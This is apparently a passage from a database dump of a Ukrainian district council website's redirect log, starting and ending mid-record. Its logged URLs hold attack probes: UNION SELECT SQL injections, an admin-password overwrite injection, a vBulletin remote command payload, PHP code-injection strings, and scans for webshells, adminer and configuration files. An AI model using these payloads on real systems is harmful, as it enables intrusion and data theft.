char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:46','0000-00-00 00:00:00',301),(33681,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:48','0000-00-00 00:00:00',301),(33682,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:49','0000-00-00 00:00:00',301),(33683,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45),char(45,120,49,57,45,81,45),char(45,120,50,48,45,81,45),char(45,120,50,49,45,81,45),char(45,120,50,50,45,81,45),char(45,120,50,51,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:50','0000-00-00 00:00:00',301),(33684,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:52','0000-00-00 00:00:00',301),(33685,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:52','0000-00-00 00:00:00',301),(33686,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:53','0000-00-00 00:00:00',301),(33687,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:54','0000-00-00 00:00:00',301),(33688,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:55','0000-00-00 00:00:00',301),(33689,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:55','0000-00-00 00:00:00',301),(33690,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:57','0000-00-00 00:00:00',301),(33691,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45),char(45,120,49,57,45,81,45),char(45,120,50,48,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:58','0000-00-00 00:00:00',301),(33692,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45),char(45,120,49,57,45,81,45),char(45,120,50,48,45,81,45),char(45,120,50,49,45,81,45),char(45,120,50,50,45,81,45),char(45,120,50,51,45,81,45),char(45,120,50,52,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:59','0000-00-00 00:00:00',301),(33693,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\" union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45),char(45,120,49,57,45,81,45),char(45,120,50,48,45,81,45),char(45,120,50,49,45,81,45),char(45,120,50,50,45,81,45),char(45,120,50,51,45,81,45),char(45,120,50,52,45,81,45),char(45,120,50,53,45,81,45) -- /* order by \"as /*',NULL,'','',1,0,'2019-07-17 10:40:59','0000-00-00 00:00:00',301),(33694,'https://malyn-rayrada.gov.ua/wp-content/themes/bl.php',NULL,'','',1,0,'2019-07-23 05:07:39','0000-00-00 00:00:00',301),(33695,'https://malyn-rayrada.gov.ua/cms/',NULL,'','',18,0,'2019-07-25 00:34:59','0000-00-00 00:00:00',301),(33696,'https://malyn-rayrada.gov.ua/dev/',NULL,'','',12,0,'2019-07-25 00:35:00','0000-00-00 00:00:00',301),(33697,'https://malyn-rayrada.gov.ua/portal/',NULL,'','',10,0,'2019-07-25 00:35:01','0000-00-00 00:00:00',301),(33698,'https://malyn-rayrada.gov.ua/web/',NULL,'','',17,0,'2019-07-25 00:35:03','0000-00-00 00:00:00',301),(33699,'https://malyn-rayrada.gov.ua/component/user/?task=register',NULL,'malyn-rayrada.gov.ua','',2,0,'2019-07-25 18:55:40','0000-00-00 00:00:00',301),(33700,'https://malyn-rayrada.gov.ua/index.php/component/user/?task=register',NULL,'malyn-rayrada.gov.ua','',1,0,'2019-07-25 18:55:40','0000-00-00 00:00:00',301),(33701,'https://malyn-rayrada.gov.ua/index.php/component/user/?task=registe',NULL,'malyn-rayrada.gov.ua','',1,0,'2019-07-25 18:55:40','0000-00-00 00:00:00',301),(33702,'https://malyn-rayrada.gov.ua/attachments/article/2243/ð¿ð°ñ ð¿ð¾ñ€ñ‚ð¸ ð¿ñ€ð¾ð³ñ€ð°ð¼.pdf',NULL,'','',2,0,'2019-07-26 17:18:25','0000-00-00 00:00:00',301),(33703,'https://malyn-rayrada.gov.ua/saless.php?check=x',NULL,'','',2,0,'2019-07-28 23:36:18','0000-00-00 00:00:00',301),(33704,'https://malyn-rayrada.gov.ua/js/calendar/cfd.php',NULL,'','',1,0,'2019-07-30 13:11:19','0000-00-00 00:00:00',301),(33705,'https://malyn-rayrada.gov.ua/mx_form',NULL,'http://malyn-rayrada.gov.ua/mx_form','',1,0,'2019-08-01 06:28:53','0000-00-00 00:00:00',301),(33706,'https://malyn-rayrada.gov.ua/plus/recommend.php?aid=1',NULL,'http://malyn-rayrada.gov.ua/plus/recommend.php?aid=1','',1,0,'2019-08-01 06:28:55','0000-00-00 00:00:00',301),(33707,'https://malyn-rayrada.gov.ua/admin/login/login_check.php?met_cookie_filter[a]=a\',admin_pass=md5(1234567)+where+id=1;+#--',NULL,'http://malyn-rayrada.gov.ua/admin/login/login_check.php?met_cookie_filter%5Ba%5D=a%27,admin_pass=md5(1234567)+where+id=1;+%23--','',1,0,'2019-08-01 06:28:58','0000-00-00 00:00:00',301),(33708,'https://malyn-rayrada.gov.ua/install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16',NULL,'http://malyn-rayrada.gov.ua/install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16','',1,0,'2019-08-01 06:29:02','0000-00-00 00:00:00',301),(33709,'https://malyn-rayrada.gov.ua/templates/jtemplate/index.html',NULL,'https://malyn-rayrada.gov.ua/templates/jtemplate/index.html','',1,0,'2019-08-05 00:16:31','0000-00-00 00:00:00',301),(33710,'https://malyn-rayrada.gov.ua/wp/wp-admin/',NULL,'','',2,0,'2019-08-10 06:03:56','0000-00-00 00:00:00',301),(33711,'https://malyn-rayrada.gov.ua/wp-xmla.php',NULL,'','',1,0,'2019-08-13 21:58:25','0000-00-00 00:00:00',301),(33712,'https://malyn-rayrada.gov.ua/modules/mod_jlplayer/js/default.htm',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2019-08-15 21:05:35','0000-00-00 00:00:00',301),(33713,'https://malyn-rayrada.gov.ua/default.htm',NULL,'http://zt.gov.ua/','',2,0,'2019-08-16 04:20:53','0000-00-00 00:00:00',301),(33714,'https://malyn-rayrada.gov.ua/wordpress/wp-admin/',NULL,'','',1,0,'2019-08-18 02:10:54','0000-00-00 00:00:00',301),(33715,'https://malyn-rayrada.gov.ua/update.php',NULL,'','',2,0,'2019-08-19 20:51:12','0000-00-00 00:00:00',301),(33716,'https://malyn-rayrada.gov.ua/index.php/1006-roglyanuto-pitannya-vikoristannya-mislivskikh-ugid',NULL,'','',2,0,'2019-08-23 23:14:58','0000-00-00 00:00:00',301),(33717,'https://malyn-rayrada.gov.ua/index.php/1280-realizatsiya-ta-zakhist-prav-lyudini',NULL,'','',4,0,'2019-08-24 06:19:23','0000-00-00 00:00:00',301),(33718,'https://malyn-rayrada.gov.ua/missok.php?x=1',NULL,'','',1,0,'2019-08-24 07:09:32','0000-00-00 00:00:00',301),(33719,'https://malyn-rayrada.gov.ua/xattacker.php?x=attacker',NULL,'','',1,0,'2019-08-24 20:14:34','0000-00-00 00:00:00',301),(33720,'https://malyn-rayrada.gov.ua/index.php/1222-granichnij-strok-podannya-podatkovoji-deklaratsiji-z-plati-za-zemlyu-na-2015-rik',NULL,'','',3,0,'2019-08-24 23:51:52','0000-00-00 00:00:00',301),(33721,'https://malyn-rayrada.gov.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pridbannya-kotliv',NULL,'','',3,0,'2019-08-25 05:04:37','0000-00-00 00:00:00',301),(33722,'https://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','',5,0,'2019-08-25 08:46:37','0000-00-00 00:00:00',301),(33723,'https://malyn-rayrada.gov.ua/wp-cokd.php',NULL,'','',1,0,'2019-08-26 03:22:34','0000-00-00 00:00:00',301),(33724,'https://malyn-rayrada.gov.ua/index.php/1065-vidpovid-departamentu-minsotspolitiki-z-pitan-chornobilskikh-pilg',NULL,'','',2,0,'2019-08-26 09:36:51','0000-00-00 00:00:00',301),(33725,'https://malyn-rayrada.gov.ua/sizing.php',NULL,'','',1,0,'2019-08-26 09:51:58','0000-00-00 00:00:00',301),(33726,'https://malyn-rayrada.gov.ua/tong.php?login=kmufg',NULL,'','',1,0,'2019-08-26 22:43:58','0000-00-00 00:00:00',301),(33727,'https://malyn-rayrada.gov.ua/index.php/1101-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s-shchodo-viplat-pensij-za-traven',NULL,'','',2,0,'2019-08-28 17:46:15','0000-00-00 00:00:00',301),(33728,'https://malyn-rayrada.gov.ua/tmpe.php',NULL,'','',1,0,'2019-08-30 16:24:22','0000-00-00 00:00:00',301),(33729,'https://malyn-rayrada.gov.ua/libraries/modules.php',NULL,'','',2,0,'2019-08-31 16:25:40','0000-00-00 00:00:00',301),(33730,'https://malyn-rayrada.gov.ua/modules/modules.php',NULL,'','',6,0,'2019-09-01 00:23:10','0000-00-00 00:00:00',301),(33731,'https://malyn-rayrada.gov.ua/wp-tmp.php',NULL,'','',1,0,'2019-09-01 05:06:30','0000-00-00 00:00:00',301),(33732,'https://malyn-rayrada.gov.ua/wp-load-5b7a23c0744615b7a23c0744af.php',NULL,'','',1,0,'2019-09-02 09:06:09','0000-00-00 00:00:00',301),(33733,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1549-pro-nadannya-dozvolu-teritorialnomu-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-na-vlashtuvannya-shpakovich-o-m',NULL,'','',2,0,'2019-09-04 04:27:11','0000-00-00 00:00:00',301),(33734,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1423-pro-zatverdzhennya-redaktora-gazeti-malinski-novini',NULL,'','',2,0,'2019-09-04 07:40:51','0000-00-00 00:00:00',301),(33735,'https://malyn-rayrada.gov.ua/imdex.php',NULL,'','',1,0,'2019-09-05 19:37:55','0000-00-00 00:00:00',301),(33736,'https://malyn-rayrada.gov.ua/db_z.php',NULL,'','',1,0,'2019-09-06 04:05:42','0000-00-00 00:00:00',301),(33737,'https://malyn-rayrada.gov.ua/api/3/action/site_read',NULL,'','',27,0,'2019-09-06 12:13:27','0000-00-00 00:00:00',301),(33738,'https://malyn-rayrada.gov.ua/api/catalog/v1',NULL,'','',27,0,'2019-09-06 12:13:28','0000-00-00 00:00:00',301),(33739,'https://malyn-rayrada.gov.ua/api/v2',NULL,'','',54,0,'2019-09-06 12:13:28','0000-00-00 00:00:00',301),(33740,'https://malyn-rayrada.gov.ua/api/1/datasets/?page_size=1',NULL,'','',27,0,'2019-09-06 12:13:29','0000-00-00 00:00:00',301),(33741,'https://malyn-rayrada.gov.ua/managedeveloper/create/',NULL,'','',27,0,'2019-09-06 12:13:30','0000-00-00 00:00:00',301),(33742,'https://malyn-rayrada.gov.ua//vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-07 13:33:18','0000-00-00 00:00:00',301),(33743,'https://malyn-rayrada.gov.ua/api/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-07 13:33:19','0000-00-00 00:00:00',301),(33744,'https://malyn-rayrada.gov.ua/laravel/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-07 13:33:24','0000-00-00 00:00:00',301),(33745,'https://malyn-rayrada.gov.ua/old/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-07 13:33:25','0000-00-00 00:00:00',301),(33746,'https://malyn-rayrada.gov.ua/new/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-07 13:33:26','0000-00-00 00:00:00',301),(33747,'https://malyn-rayrada.gov.ua/test/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-07 13:33:28','0000-00-00 00:00:00',301),(33748,'https://malyn-rayrada.gov.ua/functions.php',NULL,'','',1,0,'2019-09-07 23:16:14','0000-00-00 00:00:00',301),(33749,'https://malyn-rayrada.gov.ua/error-logs.php',NULL,'','',1,0,'2019-09-08 14:10:08','0000-00-00 00:00:00',301),(33750,'https://malyn-rayrada.gov.ua/iontrol.php',NULL,'','',1,0,'2019-09-08 22:04:07','0000-00-00 00:00:00',301),(33751,'https://malyn-rayrada.gov.ua/attachments/article/1506/підсумки+відкритого+поіменного+голосування+8+сесія.pdf',NULL,'','',1,0,'2019-09-09 13:55:29','0000-00-00 00:00:00',301),(33752,'https://malyn-rayrada.gov.ua/attachments/article/1531/підсумки+відкритого+поіменного+голосування+9+сесія.pdf',NULL,'','',1,0,'2019-09-09 13:55:45','0000-00-00 00:00:00',301),(33753,'https://malyn-rayrada.gov.ua/img+src=\'//old.kurs.com.ua/static/images/informer/kurs.png\'+width=\'52\'+height=\'26\'+alt=\'kurs.com.ua:+курс+валют+в+украине!\'+title=\'курс+валют\'+border=\'0\'+/',NULL,'','',1,0,'2019-09-09 13:57:59','0000-00-00 00:00:00',301),(33754,'https://malyn-rayrada.gov.ua/attachments/article/2101/підсумки+голосування.pdf',NULL,'','',1,0,'2019-09-09 14:09:00','0000-00-00 00:00:00',301),(33755,'https://malyn-rayrada.gov.ua/bak.php?login=canshu?',NULL,'','',1,0,'2019-09-10 12:16:25','0000-00-00 00:00:00',301),(33756,'https://malyn-rayrada.gov.ua/attachments/article/2236/ðÿð¾ñ–ð¼ðµð½ð½ðµ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2019-09-14 05:59:47','0000-00-00 00:00:00',301),(33757,'https://malyn-rayrada.gov.ua//filemanager/dialog.php',NULL,'','',1,0,'2019-09-14 14:13:10','0000-00-00 00:00:00',301),(33758,'https://malyn-rayrada.gov.ua/download.php?file=configuration.php',NULL,'','',1,0,'2019-09-21 22:41:43','0000-00-00 00:00:00',301),(33759,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2244-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',18,0,'2019-09-22 05:33:55','0000-00-00 00:00:00',301),(33760,'https://malyn-rayrada.gov.ua/adminer/',NULL,'','',1,0,'2019-09-26 00:00:29','0000-00-00 00:00:00',301),(33761,'https://malyn-rayrada.gov.ua/adminer-4.2.5-en.php',NULL,'','',2,0,'2019-10-01 10:54:17','0000-00-00 00:00:00',301),(33762,'https://malyn-rayrada.gov.ua/adminer-4.5.0-en.php',NULL,'','',2,0,'2019-10-01 12:04:36','0000-00-00 00:00:00',301),(33763,'https://malyn-rayrada.gov.ua/adminer-4.5.0-mysql-en.php',NULL,'','',2,0,'2019-10-01 12:27:15','0000-00-00 00:00:00',301),(33764,'https://malyn-rayrada.gov.ua/adminer-4.4.0-mysql-en.php',NULL,'','',2,0,'2019-10-01 12:34:02','0000-00-00 00:00:00',301),(33765,'https://malyn-rayrada.gov.ua/adminer-4.2.4.php',NULL,'','',3,0,'2019-10-01 13:13:31','0000-00-00 00:00:00',301),(33766,'https://malyn-rayrada.gov.ua/adminer-4.0.3.php',NULL,'','',1,0,'2019-10-01 13:34:11','0000-00-00 00:00:00',301),(33767,'https://malyn-rayrada.gov.ua/adminer-4.3.1-en.php',NULL,'','',2,0,'2019-10-01 13:38:55','0000-00-00 00:00:00',301),(33768,'https://malyn-rayrada.gov.ua/adminer-4.5.0-mysql.php',NULL,'','',2,0,'2019-10-01 14:31:36','0000-00-00 00:00:00',301),(33769,'https://malyn-rayrada.gov.ua/adminer-4.6.0-mysql.php',NULL,'','',2,0,'2019-10-01 15:12:54','0000-00-00 00:00:00',301),(33770,'https://malyn-rayrada.gov.ua/adminer-4.6.2-en.php',NULL,'','',2,0,'2019-10-01 16:18:00','0000-00-00 00:00:00',301),(33771,'https://malyn-rayrada.gov.ua/adminer-4.3.0-mysql-en.php',NULL,'','',2,0,'2019-10-01 16:22:46','0000-00-00 00:00:00',301),(33772,'https://malyn-rayrada.gov.ua/adminer-3.7.1.php',NULL,'','',1,0,'2019-10-01 16:48:54','0000-00-00 00:00:00',301),(33773,'https://malyn-rayrada.gov.ua/adminer-4.3.1-mysql-en.php',NULL,'','',2,0,'2019-10-01 16:51:41','0000-00-00 00:00:00',301),(33774,'https://malyn-rayrada.gov.ua/adminer-3.6.1.php',NULL,'','',1,0,'2019-10-01 16:58:35','0000-00-00 00:00:00',301),(33775,'https://malyn-rayrada.gov.ua/adminer-3.6.4.php',NULL,'','',1,0,'2019-10-01 17:17:28','0000-00-00 00:00:00',301),(33776,'https://malyn-rayrada.gov.ua/adminer-4.6.2-mysql-en.php',NULL,'','',2,0,'2019-10-01 18:01:28','0000-00-00 00:00:00',301),(33777,'https://malyn-rayrada.gov.ua/adminer-4.4.0-mysql.php',NULL,'','',2,0,'2019-10-01 18:10:05','0000-00-00 00:00:00',301),(33778,'https://malyn-rayrada.gov.ua/adminer-4.6.1-mysql.php',NULL,'','',2,0,'2019-10-01 22:00:41','0000-00-00 00:00:00',301),(33779,'https://malyn-rayrada.gov.ua/adminer-3.7.0.php',NULL,'','',1,0,'2019-10-01 22:21:19','0000-00-00 00:00:00',301),(33780,'https://malyn-rayrada.gov.ua/adminer-4.3.0.php',NULL,'','',2,0,'2019-10-01 23:35:55','0000-00-00 00:00:00',301),(33781,'https://malyn-rayrada.gov.ua/adminer-4.2.5-mysql-en.php',NULL,'','',2,0,'2019-10-02 00:05:59','0000-00-00 00:00:00',301),(33782,'https://malyn-rayrada.gov.ua/adminer-4.6.0-en.php',NULL,'','',2,0,'2019-10-02 00:15:52','0000-00-00 00:00:00',301),(33783,'https://malyn-rayrada.gov.ua/adminer-4.0.1.php',NULL,'','',1,0,'2019-10-02 00:46:43','0000-00-00 00:00:00',301),(33784,'https://malyn-rayrada.gov.ua/adminer-4.3.1.php',NULL,'','',3,0,'2019-10-02 00:58:00','0000-00-00 00:00:00',301),(33785,'https://malyn-rayrada.gov.ua/adminer-3.6.2.php',NULL,'','',1,0,'2019-10-02 07:56:23','0000-00-00 00:00:00',301),(33786,'https://malyn-rayrada.gov.ua/adminer-4.2.5.php',NULL,'','',3,0,'2019-10-02 08:24:50','0000-00-00 00:00:00',301),(33787,'https://malyn-rayrada.gov.ua/adminer-4.3.0-en.php',NULL,'','',2,0,'2019-10-02 09:05:47','0000-00-00 00:00:00',301),(33788,'https://malyn-rayrada.gov.ua/adminer-4.6.0-mysql-en.php',NULL,'','',2,0,'2019-10-02 10:31:35','0000-00-00 00:00:00',301),(33789,'https://malyn-rayrada.gov.ua/adminer-4.0.2.php',NULL,'','',1,0,'2019-10-02 10:41:55','0000-00-00 00:00:00',301),(33790,'https://malyn-rayrada.gov.ua/adminer-4.6.2-mysql.php',NULL,'','',3,0,'2019-10-02 13:11:07','0000-00-00 00:00:00',301),(33791,'https://malyn-rayrada.gov.ua/adminer-3.6.3.php',NULL,'','',1,0,'2019-10-02 13:27:43','0000-00-00 00:00:00',301),(33792,'https://malyn-rayrada.gov.ua/adminer-4.6.1-en.php',NULL,'','',2,0,'2019-10-02 13:51:18','0000-00-00 00:00:00',301),(33793,'https://malyn-rayrada.gov.ua/adminer-4.6.1.php',NULL,'','',2,0,'2019-10-02 14:30:06','0000-00-00 00:00:00',301),(33794,'https://malyn-rayrada.gov.ua/adminer-4.6.1-mysql-en.php',NULL,'','',2,0,'2019-10-02 14:45:19','0000-00-00 00:00:00',301),(33795,'https://malyn-rayrada.gov.ua/adminer-4.3.1-mysql.php',NULL,'','',3,0,'2019-10-02 14:46:52','0000-00-00 00:00:00',301),(33796,'https://malyn-rayrada.gov.ua/adminer-4.3.0-mysql.php',NULL,'','',2,0,'2019-10-02 14:48:34','0000-00-00 00:00:00',301),(33797,'https://malyn-rayrada.gov.ua/adminer-4.4.0-en.php',NULL,'','',2,0,'2019-10-02 15:04:26','0000-00-00 00:00:00',301),(33798,'https://www.malyn-rayrada.gov.ua/ajax/api/hook/decodearguments?arguments=o:12:\"vb_db_result\":2:{s:5:\"\0*\0db\";o:11:\"vb_database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"\0*\0recordset\";s:11:\"echo makman\";}',NULL,'','',1,0,'2019-10-04 06:02:26','0000-00-00 00:00:00',301),(33799,'https://malyn-rayrada.gov.ua/ajax/api/hook/decodearguments?arguments=o:12:\"vb_db_result\":2:{s:5:\"\0*\0db\";o:11:\"vb_database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"\0*\0recordset\";s:11:\"echo makman\";}',NULL,'','',1,0,'2019-10-04 09:25:02','0000-00-00 00:00:00',301),(33800,'https://malyn-rayrada.gov.ua//img src={${print(238947899389478923-34567343546345)}}',NULL,'','',1,0,'2019-10-04 14:04:38','0000-00-00 00:00:00',301),(33801,'https://malyn-rayrada.gov.ua//img src=print(238947899389478923-34567343546345);',NULL,'','',1,0,'2019-10-04 14:04:45','0000-00-00 00:00:00',301),(33802,'https://malyn-rayrada.gov.ua//img src=<?=print(238947899389478923-34567343546345);+?>',NULL,'','',1,0,'2019-10-04 14:04:50','0000-00-00 00:00:00',301),(33803,'https://malyn-rayrada.gov.ua//img src=\'{${print(238947899389478923-34567343546345)}}\'',NULL,'','',1,0,'2019-10-04 14:05:04','0000-00-00 00:00:00',301),(33804,'https://malyn-rayrada.gov.ua//img src=\"{${print(238947899389478923-34567343546345)}}\"',NULL,'','',1,0,'2019-10-04 14:05:09','0000-00-00 00:00:00',301),(33805,'https://malyn-rayrada.gov.ua//img src=\'];print(238947899389478923-34567343546345);//',NULL,'','',1,0,'2019-10-04 14:05:15','0000-00-00 00:00:00',301),(33806,'https://malyn-rayrada.gov.ua//img src=\"];print(238947899389478923-34567343546345);//',NULL,'','',1,0,'2019-10-04 14:05:20','0000-00-00 00:00:00',301),(33807,'https://malyn-rayrada.gov.ua//img src=\');print(238947899389478923-34567343546345);//',NULL,'','',1,0,'2019-10-04 14:05:26','0000-00-00 00:00:00',301),(33808,'https://malyn-rayrada.gov.ua//img src=\");print(238947899389478923-34567343546345);//',NULL,'','',1,0,'2019-10-04 14:05:32','0000-00-00 00:00:00',301),(33809,'https://malyn-rayrada.gov.ua//img src=}print(238947899389478923-34567343546345);{',NULL,'','',1,0,'2019-10-04 14:05:38','0000-00-00 00:00:00',301),(33810,'https://malyn-rayrada.gov.ua/templets/default/taglist.htm',NULL,'','',1,0,'2019-10-08 15:12:07','0000-00-00 00:00:00',301),(33811,'https://malyn-rayrada.gov.ua/index.php/989-indeksatsiya-normativnoji-groshovoji-otsinki-zemel',NULL,'','',1,0,'2019-10-09 09:33:27','0000-00-00 00:00:00',301),(33812,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2244-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',4,0,'2019-10-09 18:40:54','0000-00-00 